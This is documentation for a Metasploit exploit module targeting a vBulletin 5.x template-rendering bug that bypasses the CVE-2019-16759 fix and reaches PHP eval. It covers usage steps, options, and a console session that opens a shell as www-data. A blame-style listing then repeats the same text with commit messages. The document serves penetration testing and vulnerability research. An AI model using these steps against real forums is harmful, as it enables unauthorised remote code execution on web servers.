documentation/modules/exploit/multi/http/vbulletin_widget_template_rce.md

## Vulnerable Application

[vBulletin](https://www.vbulletin.com) A popular PHP bulletin board and blog web application.
This module has been tested successfully against vBulletin 5.6.2 running on Ubuntu Linux 19.04.

### Description

This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module
uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel'
template while also providing the 'widget_php' argument which causes the former template to load the
latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the
exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution
on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.

## Verification Steps

1. Do: `use exploit/multi/http/vbulletin_widget_template_rce`
2. Do: `set RHOSTS [IP]`
3. Do: `set VHOST [HOSTNAME]`
4. Do: `set LHOST [IP]`
5. Do: `set TARGETURI [PATH]`
6. Do: `set PAYLOAD [PAYLOADNUM]`
7. Do: `run`

## Options

### TARGETURI

The base URI path of vBulletin. **Default: /**

### PHP_CMD

The PHP function to use to execute commands on the target. **Default: shell_exec**

## Scenarios

```
msf6 > use exploit/multi/http/vbulletin_widget_template_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set VHOST vb.local
VHOST => vb.local
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set PAYLOAD 5
msf6 exploit(multi/http/vbulletin_widget_template_rce) > run

[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending php/bind_perl command payload
[*] Started bind TCP handler against 127.0.0.1:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 127.0.0.1:4444) at 2020-08-09 06:29:57 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Initial push of exploit and module for vbulletin_widget_template_rce vulnerability. 2020-08-09 17:38:52 -05:00			`## Vulnerable Application`

Whitespace adjustment and remove superfluous return statements 2020-08-12 13:59:25 -04:00			`[vBulletin](https://www.vbulletin.com) A popular PHP bulletin board and blog web application.`
			`This module has been tested successfully against vBulletin 5.6.2 running on Ubuntu Linux 19.04.`
Initial push of exploit and module for vbulletin_widget_template_rce vulnerability. 2020-08-09 17:38:52 -05:00
			`### Description`

A few last changes from msftidy and msftidy_docs. 2020-08-09 18:25:13 -05:00			`This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module`
			`uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel'`
			`template while also providing the 'widget_php' argument which causes the former template to load the`
			`latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the`
			`exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution`
Initial push of exploit and module for vbulletin_widget_template_rce vulnerability. 2020-08-09 17:38:52 -05:00			`on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.`

			`## Verification Steps`

A few last changes from msftidy and msftidy_docs. 2020-08-09 18:25:13 -05:00			1. Do: `use exploit/multi/http/vbulletin_widget_template_rce`
			2. Do: `set RHOSTS [IP]`
			3. Do: `set VHOST [HOSTNAME]`
			4. Do: `set LHOST [IP]`
			5. Do: `set TARGETURI [PATH]`
			6. Do: `set PAYLOAD [PAYLOADNUM]`
			7. Do: `run`
Initial push of exploit and module for vbulletin_widget_template_rce vulnerability. 2020-08-09 17:38:52 -05:00
			`## Options`

			`### TARGETURI`

			`The base URI path of vBulletin. Default: /`

			`### PHP_CMD`

			`The PHP function to use to execute commands on the target. Default: shell_exec`

			`## Scenarios`

			```
			`msf6 > use exploit/multi/http/vbulletin_widget_template_rce`
			`[*] Using configured payload php/meterpreter/reverse_tcp`
			`msf6 exploit(multi/http/vbulletin_widget_template_rce) > set RHOSTS 127.0.0.1`
			`RHOSTS => 127.0.0.1`
			`msf6 exploit(multi/http/vbulletin_widget_template_rce) > set VHOST vb.local`
			`VHOST => vb.local`
			`msf6 exploit(multi/http/vbulletin_widget_template_rce) > set LHOST 0.0.0.0`
			`LHOST => 0.0.0.0`
			`msf6 exploit(multi/http/vbulletin_widget_template_rce) > set TARGETURI /`
			`TARGETURI => /`
			`msf6 exploit(multi/http/vbulletin_widget_template_rce) > set PAYLOAD 5`
			`msf6 exploit(multi/http/vbulletin_widget_template_rce) > run`

			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] The target is vulnerable.`
			`[*] Sending php/bind_perl command payload`
			`[*] Started bind TCP handler against 127.0.0.1:4444`
			`[*] Command shell session 1 opened (0.0.0.0:0 -> 127.0.0.1:4444) at 2020-08-09 06:29:57 -0500`

			`id`
			`uid=33(www-data) gid=33(www-data) groups=33(www-data)`
			```